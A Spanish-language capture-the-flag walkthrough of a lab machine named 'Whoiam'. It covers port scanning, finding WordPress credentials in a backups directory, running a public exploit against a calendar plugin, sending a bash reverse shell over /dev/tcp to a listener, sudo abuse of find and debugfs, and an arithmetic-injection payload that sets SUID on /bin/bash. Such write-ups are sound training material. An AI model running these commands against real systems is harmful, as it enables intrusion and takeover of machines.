# Whoiam
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.18.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.18.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** est谩 abierto por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p80 -v 172.18.0.2
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web llamada Whoiam.
Tambi茅n al realizar el escaneo y al entrar en el c贸digo fuente vemos que hay un **WordPress**.
Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a trav茅s de:
```bash
gobuster dir -u http://172.18.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml
```
Nos llamada la atenci贸n el directorio `/backups` por lo que revisamos.
Nos lo descargamos y descomprimimos y contiene un usuario y su contrase帽a.
Nos logueamos con esas credenciales en **WordPress**.
### 馃殌 **EXPLOTACI脫N**
Vemos los plugins y hay uno que nos llama la atenci贸n.
Buscamos si contiene alg煤n exploit.
```bash
searchsploit modern events calendar
```
Nos descargamos el segundo exploit.
```bash
searchsploit -m php/webapps/50082.py
```
Ejecutamos el siguiente comando para crear una shell en el navegador.
```bash
python 50082.py -T 172.20.0.2 -P 80 -U / -u developer -p 2wmy3KrGDRD%RsA7Ty5n71L^
```
Entramos en la shell.
Nos enviamos una[ Reverse Shell](https://www.revshells.com/).
```bash
/bin/bash -c "bash -i >& /dev/tcp/172.20.0.1/443 0>&1"
```
Nos ponemos en escucha.
```bash
nc -nvlp 443
```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
Tenemos permisos **SUDO** con el usuario **rafa** con **find** revisamos esta [p谩gina](https://gtfobins.github.io/gtfobins/find/).
```bash
sudo -u rafa /usr/bin/find . -exec /bin/sh \; -quit
```
Tenemos permisos **SUDO** con el usuario **rub茅n** con **debugfs** revisamos esta [p谩gina](https://gtfobins.github.io/gtfobins/debugfs/).
```bash
sudo -u ruben /usr/sbin/debugfs
! /bin/sh
```
El scrip verifica si el n煤mero ingresado es 42 para devolver "Correct". Aprovechando esto, podemos modificar el script para que establezca el bit SUID en `/bin/bash`. Esto permitir谩 que cualquier usuario que ejecute `/bin/bash` obtenga privilegios de `root`.
```bash
prueba[$(chmod u+s /bin/bash >&2)]+42
```
```bash
bash -p
```
